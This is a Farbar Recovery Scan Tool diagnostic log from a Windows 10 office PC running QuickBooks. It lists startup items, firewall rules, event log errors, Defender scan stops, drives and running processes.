BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: intu-help-qb10 - {E795042F-8A29-42E4-B265-2C7AB38E8AEE} - C:\Program Files (x86)\Intuit\QuickBooks 2017\HelpAsyncPluggableProtocol.dll [2020-02-20] (Intuit, Inc. -> Intuit, Inc.)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\SysWOW64\mscoree.dll [2019-12-07] (Microsoft Windows -> Microsoft Corporation)

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\sharepoint.com -> hxxps://campuen-files.sharepoint.com

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2017-09-29 05:46 - 2018-12-03 08:19 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Common Files\Intuit\QBPOSSDKRuntime;C:\Program Files (x86)\HP\IdrsOCR_15.2.10.1114\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Spices\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\JA.jpg
HKU\S-1-5-21-1001776605-1151265979-3107129937-1002\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: ccleaner => 2
MSCONFIG\Services: CCleanerBrowserElevationService => 3
MSCONFIG\Services: ccleanerm => 3
MSCONFIG\Services: cphs => 3
MSCONFIG\Services: GoogleChromeElevationService => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: HPPrintScanDoctorService => 2
MSCONFIG\Services: iaStorAfsService => 3
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: QBCFMonitorService => 2
MSCONFIG\Services: QBFCService => 3
MSCONFIG\Services: QBVSS => 2
MSCONFIG\Services: QuickBooksDB27 => 3
MSCONFIG\Services: RstMwService => 2
MSCONFIG\Services: SDScannerService => 2
MSCONFIG\Services: SDUpdateService => 2
MSCONFIG\Services: TeamViewer => 2
HKLM\...\StartupApproved\StartupFolder: => "Intuit Data Protect.lnk"
HKLM\...\StartupApproved\StartupFolder: => "QuickBooks Update Agent.lnk"
HKLM\...\StartupApproved\StartupFolder: => "QuickBooks_Standard_21.lnk"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "TeamsMachineInstaller"
HKLM\...\StartupApproved\Run32: => "SDTray"
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\StartupApproved\Run: => "GoogleDriveSync"
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\StartupApproved\Run: => "com.squirrel.Teams.Teams"
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\StartupApproved\Run: => "CCleaner Smart Cleaning"
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\StartupApproved\Run: => "CCleanerBrowserAutoLaunch_EBA6280FE373BC45FCF9CDB43D2FE029"
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\StartupApproved\Run: => "MicrosoftEdgeAutoLaunch_B33159A89B3D11FEC37F658395A0456B"
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\StartupApproved\Run: => "GoogleDriveFS"
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\StartupApproved\Run: => "prueba"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{995540E7-DBA9-4543-91CB-2DE90AE50AD3}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\qblaunch.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{FCF230FD-6240-4705-A533-03FDC5E9F371}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\qblaunch.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{79263838-C0DF-482B-8D84-551E7F710BD0}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe (Intuit, Inc. -> Intuit)
FirewallRules: [{16284864-0073-4013-9637-FFF1BBF3D97A}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe (Intuit, Inc. -> Intuit)
FirewallRules: [{3A6B64F3-235B-456D-9A5A-B649638F8D82}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{5E4BE705-E5DB-448F-90AD-08885A66159F}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{021ED30E-C7E4-4894-8198-D1B3F88A36BD}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{75C41CBD-78B1-4083-BAF2-C29630A300F7}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{9BE43288-3223-4452-BB87-F03340C60331}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{2E49300B-0B50-49C0-A319-980136628816}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{1C815135-710D-4E5C-B9F4-2E755DE0A666}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\qbdbmgrn.exe (SAP -> SAP AG or an SAP affiliate company)
FirewallRules: [{B4427F78-1A26-4F8B-B763-6A8EF1292AE3}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\qbdbmgrn.exe (SAP -> SAP AG or an SAP affiliate company)
FirewallRules: [{793E310A-D0E6-4480-A15E-B5A5B6A42A47}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{B2E5E52A-8379-4DFE-AD27-10B55CCA0652}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{4BB8F53B-E890-443D-B4CD-13682CD7B534}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{EDAB2953-4472-4043-B744-F8D659844BA6}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{686EC7D2-EC8D-43DD-918D-A12E1A32CDBE}] => (Allow) C:\Program Files\HP\HP ColorLaserJet MFP M278-M281\bin\EWSProxy.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{D2446537-5F75-4E55-B9FA-7CBCB6EE79FC}] => (Allow) C:\Program Files\HP\HP ColorLaserJet MFP M278-M281\bin\FaxApplications.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{533B2128-4584-4E0D-9A33-FC36D516FF36}] => (Allow) C:\Program Files\HP\HP ColorLaserJet MFP M278-M281\bin\DigitalWizards.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{42D2A4B3-1717-4CC5-A46D-94661F92FB49}] => (Allow) C:\Program Files\HP\HP ColorLaserJet MFP M278-M281\bin\SendAFax.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{29F6DC2E-935C-4ACB-A6A3-535DED85D2B3}] => (Allow) C:\Program Files\HP\HP ColorLaserJet MFP M278-M281\bin\FaxPrinterUtility.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{64F37FC5-9682-488F-B7A1-E33537529E3C}] => (Allow) C:\Program Files\HP\HP ColorLaserJet MFP M278-M281\Bin\DeviceSetup.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{CFF24E33-06E2-417A-ADE7-E746B0359CBB}] => (Allow) LPort=5357
FirewallRules: [{ACC4DF4B-3E22-452B-B664-E96DA333E11E}] => (Allow) C:\Program Files\HP\HP ColorLaserJet MFP M278-M281\Bin\HPNetworkCommunicatorCom.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{7A01A7FC-30F2-43E6-AB8E-E4AAF0F3E2BA}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6D59EC30-DCE0-4F4B-94CB-CA71DD2FCC25}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{3A2F14C4-F5EB-4B15-9A4E-D4DEB3E66BFA}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{2B9484E4-C3F4-4EAA-B51F-F32A0A4D45FD}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{324995A9-4E1D-4924-9EED-3526411D4278}C:\program files\avast software\avast\avastui.exe] => (Block) C:\program files\avast software\avast\avastui.exe => No File
FirewallRules: [UDP Query User{01061E88-0E48-41BF-BFF0-4645F1032548}C:\program files\avast software\avast\avastui.exe] => (Block) C:\program files\avast software\avast\avastui.exe => No File
FirewallRules: [{C58F96C4-A765-4AF7-926A-D4A372E2ACB5}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{C08DB9AA-4ABF-4840-8EF8-E8220B4FAE28}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.174.631.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{3AF2CF79-0DDA-49BA-BE27-17569546FC58}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.174.631.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{F81EF7F2-3ADC-4D0F-B438-2F833B5A2717}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.174.631.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{E23FE3B3-11B1-4853-83F0-357FC014A3EF}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.174.631.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{431B8400-CFAB-468A-83B5-CBC5D590F2CA}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.174.631.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{8EE19B7D-795E-413A-A71D-940BFE34D3F6}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.174.631.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{DA87758F-C512-41DC-BB29-6D8B580B9A32}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.174.631.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{AB2867A3-D0AD-4AE3-8C4B-C06263DB53BF}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.174.631.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{29DFC5DD-A680-4483-83D8-C3BA63547C58}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.79.95.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{25C3F6FD-6240-47FA-92A0-848C7C9F6BA5}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.79.95.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{C8DCC20A-B654-4C29-93CE-158A08F2CD96}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.79.95.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{45A4B1C1-6832-4D67-A2BD-97D4E566EA73}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.79.95.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{4312ED41-9163-4470-B8CD-346C9335E891}] => (Allow) C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe (Piriform Software Ltd -> Piriform Software)
FirewallRules: [{72B9F358-F9B9-44A3-9668-CB72E4A2EAA3}] => (Allow) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\96.0.1054.62\msedgewebview2.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{DF189A94-74DA-4AAF-AB02-568086C82980}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{180619A7-2EDA-4374-970C-57BBD7643BA9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{3DC94649-7F5E-4F42-927D-D682ABA8E46A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{6F63F8DE-400C-47B2-9BE7-B641B487F36D}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{B34877D6-947B-44DF-A69D-43E34C8B3727}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service

==================== Restore Points =========================

20-12-2021 08:35:54 Scheduled Checkpoint
27-12-2021 10:25:58 Scheduled Checkpoint
05-01-2022 09:24:03 Scheduled Checkpoint

==================== Faulty Device Manager Devices ============

Name: PCI Serial Port
Description: PCI Serial Port
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: ========================

Application errors:
==================
Error: (01/06/2022 08:39:56 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Faulting module name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Exception code: 0xc0000005
Fault offset: 0x00005c92
Faulting process id: 0x2a80
Faulting application start time: 0x01d8031c09705ad4
Faulting application path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Faulting module path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Report Id: a689181d-310d-40d4-b570-375bc3456645
Faulting package full name: 
Faulting package-relative application ID:

Error: (01/06/2022 08:33:08 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Faulting module name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Exception code: 0xc0000005
Fault offset: 0x00005c92
Faulting process id: 0x101c
Faulting application start time: 0x01d8031b15d54ac4
Faulting application path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Faulting module path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Report Id: 6c5d20c2-6f95-4e60-8bfc-70908908dfbc
Faulting package full name: 
Faulting package-relative application ID:

Error: (01/06/2022 08:32:49 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Faulting module name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Exception code: 0xc0000005
Fault offset: 0x00005c92
Faulting process id: 0x301c
Faulting application start time: 0x01d8031b0aa3e61b
Faulting application path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Faulting module path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Report Id: 2da6a4bf-e18f-4ba8-b755-99aadaf4f54e
Faulting package full name: 
Faulting package-relative application ID:

Error: (01/06/2022 08:32:38 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Faulting module name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Exception code: 0xc0000005
Fault offset: 0x00005c92
Faulting process id: 0x1c64
Faulting application start time: 0x01d8031b03e78b71
Faulting application path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Faulting module path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Report Id: e250fe03-924e-45c0-83b8-8e40140ac5f6
Faulting package full name: 
Faulting package-relative application ID:

Error: (01/06/2022 08:30:32 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Faulting module name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Exception code: 0xc0000005
Fault offset: 0x00005c92
Faulting process id: 0x3e50
Faulting application start time: 0x01d8031ab90afced
Faulting application path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Faulting module path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Report Id: 1e1ea152-fcf4-4c1e-bad5-a8d0aeb229b0
Faulting package full name: 
Faulting package-relative application ID:

Error: (01/06/2022 08:29:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Faulting module name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Exception code: 0xc0000005
Fault offset: 0x00005c92
Faulting process id: 0x32ac
Faulting application start time: 0x01d8031aa3cf9cff
Faulting application path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Faulting module path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Report Id: 23ffce60-ba77-4e47-949f-80a4b86bbdd9
Faulting package full name: 
Faulting package-relative application ID:

Error: (01/06/2022 08:23:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Faulting module name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Exception code: 0xc0000005
Fault offset: 0x00005c92
Faulting process id: 0x2484
Faulting application start time: 0x01d80319b0364b07
Faulting application path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Faulting module path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Report Id: 5dc2ca62-f68f-4222-90b3-dff184470e8f
Faulting package full name: 
Faulting package-relative application ID:

Error: (01/06/2022 08:22:49 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Faulting module name: SDUpdate.exe, version: 2.8.68.100, time stamp: 0x5ea5e0d1
Exception code: 0xc0000005
Fault offset: 0x00005c92
Faulting process id: 0xbc8
Faulting application start time: 0x01d80319a5027b1b
Faulting application path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Faulting module path: C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Report Id: e2c44b4e-ccac-4191-87f5-344e703745d4
Faulting package full name: 
Faulting package-relative application ID:


System errors:
=============
Error: (01/05/2022 11:01:25 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The QBCFMonitorService service terminated unexpectedly.  It has done this 1 time(s).

Error: (12/30/2021 09:36:50 AM) (Source: Ntfs) (EventID: 137) (User: )
Description: The default transaction resource manager on volume E: encountered a non-retryable error and could not start.  The data contains the error code.

Error: (12/30/2021 09:28:48 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-RLQ6923)
Description: The server {9BA05972-F6A8-11CF-A442-00A0C90A8F39} did not register with DCOM within the required timeout.

Error: (12/30/2021 09:28:45 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-RLQ6923)
Description: The server {20A10BD4-0FF4-45E8-87EF-D2708E99CEAA} did not register with DCOM within the required timeout.

Error: (12/30/2021 08:31:19 AM) (Source: Ntfs) (EventID: 137) (User: )
Description: The default transaction resource manager on volume E: encountered a non-retryable error and could not start.  The data contains the error code.

Error: (12/27/2021 08:06:33 AM) (Source: Ntfs) (EventID: 137) (User: )
Description: The default transaction resource manager on volume E: encountered a non-retryable error and could not start.  The data contains the error code.

Error: (12/27/2021 07:47:29 AM) (Source: Ntfs) (EventID: 137) (User: )
Description: The default transaction resource manager on volume E: encountered a non-retryable error and could not start.  The data contains the error code.

Error: (12/22/2021 08:44:51 AM) (Source: Ntfs) (EventID: 137) (User: )
Description: The default transaction resource manager on volume E: encountered a non-retryable error and could not start.  The data contains the error code.


Windows Defender:
================
Date: 2022-01-05 09:58:02
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2022-01-04 10:16:28
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2022-01-03 09:45:20
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2022-01-02 11:36:57
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2022-01-01 11:36:57
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Event[0]:

Date: 2021-12-10 09:44:46
Description: 
Microsoft Defender Antivirus has encountered an error trying to update security intelligence.
New security intelligence Version: 
Previous security intelligence Version: 1.355.38.0
Update Source: Microsoft Update Server
Security intelligence Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.18800.4
Error code: 0x8024001e
Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support. 

CodeIntegrity:
===============
Date: 2022-01-06 08:41:02
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\ESET\ESET Security\eamsi.dll because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2022-01-06 07:51:18
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\ImmersiveControlPanel\SystemSettings.exe) attempted to load \Device\HarddiskVolume2\Program Files\Google\Drive File Stream\54.0.2.0\crashpad_handler.exe that did not meet the Microsoft signing level requirements.


==================== Memory info =========================== 

BIOS: Dell Inc. A07 09/10/2011
Motherboard: Dell Inc. 0VNP2H
Processor: Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz
Percentage of memory in use: 45%
Total physical RAM: 8072.89 MB
Available physical RAM: 4424.1 MB
Total Virtual: 9456.87 MB
Available Virtual: 4957.69 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:930.47 GB) (Free:857.97 GB) NTFS
Drive e: (New Volume) (Fixed) (Total:74.53 GB) (Free:0 GB) NTFS
Drive f: () (Removable) (Total:7.49 GB) (Free:7.48 GB) FAT32

\\?\Volume{1549f232-0000-0000-0000-100000000000}\ (System Reserved) (Fixed) (Total:0.54 GB) (Free:0.5 GB) NTFS
\\?\Volume{1549f232-0000-0000-0000-60c0e8000000}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 1549F232)
Partition 1: (Active) - (Size=549 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=930.5 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=517 MB) - (Type=27)

==========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 74.5 GB) (Disk ID: AE32AE32)
Partition 1: (Not Active) - (Size=74.5 GB) - (Type=07 NTFS)

==========================================================
Disk: 2 (Protective MBR) (Size: 7.5 GB) (Disk ID: 00000000)

Partition: GPT.

==================== End of Addition.txt =======================

FRST.txt

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 27-12-2021
Ran by Spices (administrator) on DESKTOP-RLQ6923 (Dell Inc. OptiPlex 990) (06-01-2022 08:40:38)
Running from C:\Users\Spices\OneDrive\Documents\OneDrive\Desktop
Loaded Profiles: Spices & QBDataServiceUser27
Platform: Microsoft Windows 10 Pro Version 21H1 19043.1415 (X64) Language: English (United States)
Default browser: Chrome
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(ESET, spol. s r.o. -> ESET) C:\Program Files\ESET\ESET Security\eguiProxy.exe
(ESET, spol. s r.o. -> ESET) C:\Program Files\ESET\ESET Security\ekrn.exe
(Google LLC -> ) C:\Program Files\Google\Drive File Stream\54.0.2.0\crashpad_handler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2103.8.0_x64__8wekyb3d8bbwe\Calculator.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.20544.0_x64__8wekyb3d8bbwe\HxOutlook.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.20544.0_x64__8wekyb3d8bbwe\HxTsr.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MoUsoCoreWorker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
